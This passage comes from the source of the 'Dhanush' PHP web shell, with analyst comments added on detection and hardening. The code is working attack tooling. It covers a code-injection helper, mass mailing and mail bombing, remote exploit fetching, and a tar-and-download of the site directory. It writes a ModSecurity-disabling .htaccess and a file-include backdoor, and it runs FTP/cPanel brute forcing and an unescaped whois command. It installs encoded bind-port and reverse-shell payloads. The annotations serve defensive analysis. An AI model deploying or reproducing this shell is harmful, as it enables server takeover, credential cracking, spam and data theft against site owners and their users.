5428 document.getElementById("showdeface").innerHTML=waitstate;
5429 var ajaxRequest;
5430 ajaxRequest = new XMLHttpRequest();
5431
5432 ajaxRequest.onreadystatechange = function()
5433 {
5434 if(ajaxRequest.readyState == 4)
5435 {
5436 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
5437 }
5438 }
5439
5440 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5441 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5442 ajaxRequest.send(params);
5443}
// Analyst note: control-panel helper that POSTs a form-encoded body to the
// shell's own URL with the fields pathtomass, mode, filetype and injectthis
// (only injectthis is URL-encoded). The reply is rendered into "showinject".
// The field names suggest bulk modification of files of one type under a
// path; the server-side handler is outside this view, so treat that as an
// assumption to confirm.
// Detection: POST bodies are normally absent from access logs, so this action
// is visible only to a WAF or body-logging proxy (match on the field names)
// and, on disk, to file-integrity monitoring that flags many web files
// changing within the same second.
5444function codeinjector(pathtomass,mode,filetype,injectthis)
5445{
5446 var injectthis = encodeURIComponent(injectthis);
5447 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
5448 document.getElementById("showinject").innerHTML=waitstate;
5449 var ajaxRequest;
5450 ajaxRequest = new XMLHttpRequest();
5451
5452 ajaxRequest.onreadystatechange = function()
5453 {
5454 if(ajaxRequest.readyState == 4)
5455 {
5456 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
5457 }
5458 }
5459
5460 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5461 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5462 ajaxRequest.send(params);
5463}
// Analyst note: control-panel helper for the shell's two mail-abuse modes,
// selected by `mailfunction`: "massmailing" (fields to, subject, from,
// message) and "dobombing" (fields to, subject, a repeat count, padding,
// message). The body is POSTed form-encoded to the shell's own URL and the
// reply is rendered into "showmail".
// NOTE(review): the "×=" in the dobombing branch looks like this page's
// HTML-entity decoding of an ampersand followed by "times="; when writing a
// body-inspection rule, match the field name "times" - confirm against
// another copy of the sample.
// Detection: the request itself is a POST, so look instead for a sudden rise
// in the local mail queue or in outbound SMTP from the web-server account,
// and for "mailfunction=" in any proxy or WAF that records request bodies.
5464function sendmail(mailfunction,to,subject,message,from,times,padding)
5465{
5466 var message = encodeURIComponent(message);
5467 if(mailfunction == "massmailing")
5468 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
5469 else if(mailfunction == "dobombing")
5470 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
5471 document.getElementById("showmail").innerHTML=waitstate;
5472 var ajaxRequest;
5473 ajaxRequest = new XMLHttpRequest();
5474
5475 ajaxRequest.onreadystatechange = function()
5476 {
5477 if(ajaxRequest.readyState == 4)
5478 {
5479 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
5480 }
5481 }
5482
5483 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5484 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5485 ajaxRequest.send(params);
5486}
// Analyst note: control-panel helper that POSTs two form fields, code and
// intext (the checked state of the "intext" checkbox), to the shell's own URL
// and renders the reply into "showresult". The handler for the "code" field
// is outside this view; given the menu entry 'PHP' => 'phpc' later in the
// file it presumably evaluates the submitted text on the server - confirm
// against the handler.
// Detection: only body-aware tooling sees this request. On the host, PHP
// hardening that disables eval-style execution paths and alerts on the web
// server spawning child processes is the more reliable signal.
5487function execode(code)
5488{
5489 var intext = document.getElementById('intext').checked;
5490 var message = encodeURIComponent(message);
5491 var params = "code="+code+"&intext="+intext;
5492 document.getElementById("showresult").innerHTML=waitstate;
5493 var ajaxRequest;
5494 ajaxRequest = new XMLHttpRequest();
5495
5496 ajaxRequest.onreadystatechange = function()
5497 {
5498 if(ajaxRequest.readyState == 4)
5499 {
5500 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
5501 }
5502 }
5503
5504 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5505 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5506 ajaxRequest.send(params);
5507}
5508function malwarefun(malwork)
5509{
5510 var malpath = document.getElementById('createfile').value;
5511 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
5512 var ajaxRequest;
5513 ajaxRequest = new XMLHttpRequest();
5514
5515 ajaxRequest.onreadystatechange = function()
5516 {
5517 if(ajaxRequest.readyState == 4)
5518 {
5519 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
5520 }
5521 }
5522
5523 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
5524 ajaxRequest.send(null);
5525}
// Analyst note: control-panel helper behind the "Get Exploit" form further
// down the page. It sends a GET to the shell's own URL with the bare key
// "uploadurl" plus wurl (a remote URL), functiontype and path, and renders the
// reply into "showexp". The form offers these functiontype values: wwget,
// wlynx, wfread, wfetch, wlinks, wget, wcurl.
// Detection: "uploadurl&wurl=" in the query string is a strong access-log
// signature, and the wurl value records which remote host was contacted. The
// download handler is outside this view; the option names suggest it shells
// out to the matching download tool, so alert on the web-server account
// starting such tools and restrict outbound HTTP from web tiers.
5526function getexploit(wurl,path,functiontype)
5527{
5528 document.getElementById("showexp").innerHTML=waitstate;
5529 var ajaxRequest;
5530 ajaxRequest = new XMLHttpRequest();
5531
5532 ajaxRequest.onreadystatechange = function()
5533 {
5534 if(ajaxRequest.readyState == 4)
5535 {
5536 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
5537 }
5538 }
5539
5540 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
5541 ajaxRequest.send(null);
5542}
5543function showMsg(msg)
5544{
5545 if(msg == 'smf')
5546 {
5547 document.getElementById('tableprefix').value="smf_";
5548 document.getElementById('fid').style.display='block';
5549 document.getElementById('wpress').style.display='none';
5550 document.getElementById('joomla').style.display='none';
5551 }
5552 if(msg == 'mybb')
5553 {
5554 document.getElementById('tableprefix').value="mybb_";
5555 document.getElementById('wpress').style.display='none';
5556 document.getElementById('joomla').style.display='none';
5557 document.getElementById('fid').style.display='block';
5558 }
5559 if(msg == 'ipb' || msg == 'vb')
5560 {
5561 document.getElementById('tableprefix').value="";
5562 document.getElementById('wpress').style.display='none';
5563 document.getElementById('joomla').style.display='none';
5564 document.getElementById('fid').style.display='block';
5565 }
5566 if(msg == 'wp')
5567 {
5568 document.getElementById('tableprefix').value="wp_";
5569 document.getElementById('wpress').style.display='block';
5570 document.getElementById('fid').style.display='none';
5571 document.getElementById('joomla').style.display='none';
5572 }
5573 if(msg == 'joomla')
5574 {
5575 document.getElementById('joomla').style.display='block';
5576 document.getElementById('tableprefix').value="jos_";
5577 document.getElementById('wpress').style.display='none';
5578 document.getElementById('fid').style.display='none';
5579
5580
5581 }
5582}
5583function checkforum(msg)
5584{
5585 if(msg == 'smf')
5586 {
5587 document.getElementById('tableprefix').value="smf_";
5588 document.getElementById('smfipb').style.display='block';
5589 document.getElementById('myjoomla').style.display='none';
5590 document.getElementById('wordpres').style.display='none';
5591 }
5592 if(msg == 'phpbb')
5593 {
5594 document.getElementById('tableprefix').value="phpb_";
5595 document.getElementById('myjoomla').style.display='none';
5596 document.getElementById('smfipb').style.display='block';
5597 document.getElementById('wordpres').style.display='none';
5598 }
5599 if(msg == 'mybb')
5600 {
5601 document.getElementById('tableprefix').value="mybb_";
5602 document.getElementById('myjoomla').style.display='none';
5603 document.getElementById('smfipb').style.display='none';
5604 }
5605 if(msg == 'vb')
5606 {
5607 document.getElementById('tableprefix').value="";
5608 document.getElementById('myjoomla').style.display='none';
5609 document.getElementById('smfipb').style.display='none';
5610 }
5611 if(msg == 'ipb')
5612 {
5613 document.getElementById('myjoomla').style.display='none';
5614 document.getElementById('smfipb').style.display='block';
5615 document.getElementById('tableprefix').value="";
5616 document.getElementById('wordpres').style.display='none';
5617
5618 }
5619 if(msg == 'wp')
5620 {
5621 document.getElementById('tableprefix').value="wp_";
5622 document.getElementById('myjoomla').style.display='none';
5623 document.getElementById('smfipb').style.display='block';
5624 document.getElementById('wordpres').style.display='block';
5625 }
5626 if(msg == 'joomla')
5627 {
5628 document.getElementById('myjoomla').style.display='block';
5629 document.getElementById('tableprefix').value="jos_";
5630 document.getElementById('smfipb').style.display='none';
5631
5632 }
5633}
5634</script>
5635<body>
5636<?php
5637
5638$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
5639
5640$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
5641
5642$bind_port_c="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";
5643
5644$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
5645shellstyle();
5646?>
5647<div align="center">
5648<a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Arjun </font></a>
5649
5650</div>
5651<hr color="#1B1B1B">
5652
5653<table cellpadding="0" style="width:100%;">
5654 <tr>
5655 <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
5656 <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
5657 <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
5658 </tr>
5659 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
5660 <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
5661 <?php $d0mains = @file("/etc/named.conf");
5662 $users=@file('/etc/passwd');
5663 if($d0mains)
5664 {
5665 $count;
5666 foreach($d0mains as $d0main)
5667 {
5668 if(@ereg("zone",$d0main))
5669 {
5670 preg_match_all('#zone "(.*)"#', $d0main, $domains);
5671 flush();
5672 if(strlen(trim($domains[1][0])) > 2)
5673 {
5674 flush();
5675 $count++;
5676 }
5677 }
5678 }
5679 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
5680 }
5681 else if($users)
5682 {
5683 $file = fopen("/etc/passwd", "r");
5684 while(!feof($file))
5685 {
5686 $s = fgets($file);
5687 $matches = array();
5688 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5689 $matches = str_replace("home/","",$matches[1]);
5690 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5691 continue;
5692 $count++;
5693 }
5694 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
5695 </tr><?php } ?>
5696 <tr>
5697 <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
5698 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
5699
5700 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
5701 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
5702 </tr>
5703
5704 <tr>
5705 <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
5706 <td style="width:30%;">Current Directory : <span id="crdir"><font color="#009900">
5707 <?php
5708 $d = str_replace("\\",$directorysperator,$dir);
5709 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
5710 $d = str_replace("\\\\","\\",$d);
5711 $dispd = htmlspecialchars($d);
5712 $pd = $e = explode($directorysperator,substr($d,0,-1));
5713 $i = 0;
5714 foreach($pd as $b)
5715 {
5716 $t = '';
5717 $j = 0;
5718 foreach ($e as $r)
5719 {
5720 $t.= $r.$directorysperator;
5721 if ($j == $i) {break;}
5722 $j++;
5723 }
5724$href=addslashes($t);
5725
5726 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
5727 $i++;
5728 }
5729
5730 ?>
5731 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
5732 <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
5733 <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
5734 <?php if($os == "Linux") { ?><td><a href="<?php echo $self.'?downloadit'?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
5735 </tr>
5736 </table>
5737
5738<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
5739 $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
5740 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
5741 <tr>";
5742 $menu = '';
5743
5744 foreach($m1 as $k => $v)
5745 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5746 echo $menu;
5747 echo "</tr>
5748</table>
5749<div style=\"float:left;\">
5750 <a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </font></a>
5751 <a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] </font></a>
5752 <a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
5753<table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; cellpadding=2>
5754 <tr align=center>";
5755 foreach($m2 as $k => $v)
5756 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5757 echo $menu1;
5758 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
5759 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
5760 </tr>
5761</table>";?>
5762
5763<div id="showmaindata"></div>
5764<?php
5765
// Analyst note: bulk-exfiltration handler. When the request carries the
// "downloadit" query key, the current working directory is archived with tar
// into "backup.tar" (relative path, so it lands in the working directory) via
// execmd(), which is defined outside this view, and the archive is then
// streamed to the client as an attachment before the script exits.
// The explode/for loop only leaves $nfd equal to "backup.tar".
// The archive is not removed in the visible code.
// Indicators: a "backup.tar" file inside a web-served directory, a request
// with "?downloadit" answered by an unusually large application/octet-stream
// response, and a tar process parented by the web server.
5766if(isset($_GET["downloadit"]))
5767{
5768 $FolderToCompress = getcwd();
5769 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
5770
5771 $prd=explode("/","backup.tar");
5772 for($i=0;$i<sizeof($prd);$i++)
5773 {
5774 $nfd=$prd[$i];
5775 }
5776 @ob_clean();
5777 header("Content-type: application/octet-stream");
5778 header("Content-length: ".filesize($nfd));
5779 header("Content-disposition: attachment; filename=\"".$nfd."\";");
5780 readfile($nfd);
5781 exit;
5782}
5783//Turn Safe Mode Off
5784
// Analyst note: environment-tampering step. It runs whenever
// getDisabledFunctions() does not return "None" or safe() does not return
// "OFF" (both helpers are defined outside this view), and it writes three
// files into the current working directory, each opened with "w+" so any
// existing file of that name is truncated:
//   .htaccess - an IfModule mod_security.c block turning the ModSecurity 1.x
//               filter directives off; an existing site .htaccess is lost,
//               which can be the first visible symptom of the compromise
//   ini.php   - a stub that include()s whatever the "file" and "ss" query
//               parameters name; it is a second, independent entry point and
//               must be removed during cleanup along with the shell itself
//   php.ini   - a single "safe_mode = Off" line
// Only the last handle is closed.
// Indicators: these three files appearing together with the same mtime in a
// web directory. Hardening: deny per-directory overrides of security-module
// and PHP settings (AllowOverride, per-directory ini scanning) so files
// dropped by the web-server account cannot change them.
5785 if(getDisabledFunctions() != "None" || safe() != "OFF")
5786 {
5787 $file_pointer = fopen(".htaccess", "w+");
5788 fwrite($file_pointer, "<IfModule mod_security.c>
5789 SecFilterEngine Off
5790 SecFilterScanPOST Off
5791 </IfModule> \n\r");
5792
5793 $file_pointer = fopen("ini.php", "w+");
5794 fwrite($file_pointer, "<?
5795echo ini_get(\"safe_mode\");
5796echo ini_get(\"open_basedir\");
5797include(\$_GET[\"file\"]);
5798ini_restore(\"safe_mode\");
5799ini_restore(\"open_basedir\");
5800echo ini_get(\"safe_mode\");
5801echo ini_get(\"open_basedir\");
5802include(\$_GET[\"ss\"]);
5803?>");
5804
5805 $file_pointer = fopen("php.ini", "w+");
5806 fwrite($file_pointer, "safe_mode = Off");
5807
5808 fclose($file_pointer);
5809
5810 }
5811
5812 else if(isset($_POST['cpanelattack']))
5813 {
5814 if(!empty($_POST['username']) && !empty($_POST['password']))
5815 {
5816 $userlist=explode("\n",$_POST['username']);
5817 $passlist=explode("\n",$_POST['password']);
5818
5819 if($_POST['cracktype'] == "ftp")
5820 {
5821 foreach ($userlist as $user)
5822 {
5823 $pureuser = trim($user);
5824 foreach ($passlist as $password )
5825 {
5826 $purepass = trim($password);
5827 ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5828 }
5829 }
5830 }
5831 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
5832 {
5833 if($cracktype == "telnet")
5834 $cpanel_port="23";
5835 else
5836 $cpanel_port="2082";
5837 foreach ($userlist as $user)
5838 {
5839 $pureuser = trim($user);
5840
5841 echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
5842 Processing user $pureuser ...</font></b><br><br>";
5843
5844 foreach ($passlist as $password )
5845 {
5846 $purepass = trim($password);
5847 cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5848
5849 }
5850 }
5851 }
5852 }
5853 else
5854 $bdmessage = "<center>Enter Username & Password List<center>";
5855 }
5856
// Analyst note: "info" lookup branch. The raw value of the "info" query
// parameter is appended to a "whois " command line and run through
// shell_exec() with no escaping; the output is placed in $bdmessage with only
// nl2br() applied, so it is not HTML-escaped either.
// Indicators: "?info=" requests to the shell in access logs and whois (or any
// other) child processes started by the web-server account.
5857else if(isset($_GET['info']))
5858{
5859 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
5860}
// Analyst note: file-drop branch, taken when the POST carries the field "u"
// (the Upload button of the multipart form further down). The destination
// directory comes from the request ("path"), the file keeps the name the
// client supplied, and move_uploaded_file() places it there; both OS branches
// build the same path. A status line goes into $bdmessage and the page then
// re-lists the directory through changedir().
// Indicators: multipart POSTs to the shell with the fields uploadfile, path
// and u; new files owned by the web-server account in web directories.
// Hardening: keep directories writable by the web server non-executable for
// PHP, and alert on script files created by the web-server account.
5861else if(isset($_POST['u']))
5862{
5863 $path = $_REQUEST['path'];
5864 if(is_dir($path))
5865 {
5866 $setuploadvalue = 0;
5867 $uploadedFilePath = $_FILES['uploadfile']['name'];
5868 $tempName = $_FILES['uploadfile']['tmp_name'];
5869 if($os == "Windows")
5870 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5871 else if($os == "Linux")
5872 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5873 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
5874 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
5875 else
5876 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
5877 }
5878 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
5879}
// Analyst note: listener-installation branch, taken when the POST carries
// "backdoor" together with passwd, port and lang. The payloads are the
// base64+deflate blobs held in $bind_port_c and $bind_port_p earlier in the
// file; the variable names indicate a port-binding listener.
//   lang "c"    - source is written to backp.c in the working directory, or
//                 under /tmp when the working directory is not writable, then
//                 compiled with gcc to "backp" and started in the background
//                 with the port and password as arguments; the process list
//                 is then checked for it
//   lang "perl" - the script is written as bp.pl and started with perl in the
//                 same way
// The port and password values go into the shell command lines unescaped.
// eregi() was removed in PHP 7.0, which helps date the sample to PHP 5.x hosts.
// Indicators: backp.c, backp or bp.pl in a web directory or in /tmp; gcc or
// perl started by the web-server account; a new listening socket owned by
// that account; the listener password visible in the process arguments.
// Hardening: no compiler on web hosts, noexec on /tmp and upload
// directories, and host firewalling of unexpected inbound ports.
5880else if(isset($_POST['backdoor']))
5881{
5882 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
5883 { ?><script type="text/javascript">gethome('connect');</script><?php
5884 $passwd = $_POST['passwd'];
5885
5886 if($_POST['lang'] == 'c')
5887 {
5888 if(is_writable("."))
5889 {
5890 @$fh=fopen(getcwd()."/backp.c",'w');
5891 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5892 @fclose($fh);
5893 execmd("chmod 0755 ".getcwd()."/backp.c");
5894 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
5895 execmd("chmod 0755 ".getcwd()."/backp");
5896 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
5897 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5898 if(eregi("backp".$_POST['port'],$scan))
5899 $bdmessage = "Process found running, backdoor setup successfully.";
5900 else
5901 $bdmessage = "Process not found running, backdoor not setup successfully.";
5902 }
5903 else
5904 {
5905 @$fh=fopen("/tmp/backp.c","w");
5906 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5907 @fclose($fh);
5908 execmd("chmod 0755 /tmp/backp.c");
5909 execmd("gcc -o /tmp/backp /tmp/backp.c");
5910 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
5911 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5912 if(eregi("backp".$_POST['port'],$scan))
5913 $bdmessage = "Process found running, backdoor setup successfully.";
5914 else
5915 $bdmessage = "Process not found running, backdoor not setup successfully.";
5916 }
5917 }
5918 if($_POST['lang'] == 'perl')
5919 {
5920 if(is_writable("."))
5921 {
5922 @$fh=fopen(getcwd()."/bp.pl",'w');
5923 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5924 @fclose($fh);
5925 execmd("chmod 0755 ".getcwd()."/bp.pl");
5926 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5927
5928 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5929 }
5930 else
5931 {
5932 @$fh=fopen("/tmp/bp.pl","w");
5933 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5934 @fclose($fh);
5935 execmd("chmod 0755 ".getcwd()."/bp.pl");
5936 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5937 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5938 }
5939 }
5940 }
5941}
// Analyst note: outbound-connection branch, taken when the POST carries
// "backconnect" with non-empty ip and port. Three variants, chosen by "lang":
//   perl   - payload from $backconnect_perl is written as bc.pl (working
//            directory, else /tmp), started in the background with the host
//            and port, and the file is unlinked straight away
//   python - same pattern with $back_connect_p and bc.py, made mode 0777
//   php    - no file is written: fsockopen() connects out, a fixed banner and
//            the output of uname -a, pwd and id are sent, and every line read
//            from the socket is handed to exec_all() until the peer closes
// Forensics: because the script files are deleted immediately after launch,
// their absence on disk proves nothing; check the process list and open
// sockets of the web-server account instead. The session is cleartext, so the
// banner text and the "(dhanush)[$]> " prompt are usable network signatures.
// Hardening: default-deny egress from web servers; alert on interpreters or
// long-lived outbound TCP sessions started by the web-server account.
5942else if(isset($_POST['backconnect']))
5943{
5944 if($_POST['ip'] != "" && $_POST['port'] != "")
5945 { ?><script type="text/javascript">gethome('connect');</script><?php
5946 $host = $_POST['ip'];
5947 $port = $_POST['port'];
5948 if($_POST["lang"] == "perl")
5949 {
5950 if(is_writable("."))
5951 {
5952 @$fh=fopen(getcwd()."/bc.pl",'w');
5953 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5954 @fclose($fh);
5955 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5956 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
5957 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
5958 }
5959 else
5960 {
5961 @$fh=fopen("/tmp/bc.pl","w");
5962 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5963 @fclose($fh);
5964 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5965 execmd("perl /tmp/bc.pl $host $port &",$disable);
5966 if(!@unlink("/tmp/bc.pl"))
5967 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5968 }
5969 }
5970 else if($_POST["lang"] == "python")
5971 {
5972 if(is_writable("."))
5973 {
5974 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
5975 if($w_file)
5976 {
5977 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5978 @fclose($w_file);
5979 chmod(getcwd().'/bc.py', 0777);
5980 }
5981 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
5982 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5983
5984 if(!@unlink(getcwd()."/bc.py"))
5985 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5986 }
5987 else
5988 {
5989 $w_file=@fopen("/tmp/bc.py","w");
5990 if($w_file)
5991 {
5992 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5993 @fclose($w_file);
5994 chmod('/tmp/bc.py', 0777);
5995 }
5996 execmd("python /tmp/bc.py $host $port &",$disable);
5997 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5998 if(!@unlink("/tmp/bc.py"))
5999 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
6000 }
6001 }
6002 else if($_POST["lang"] == "php")
6003 {
6004 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6005 $ip = $_POST['ip'];
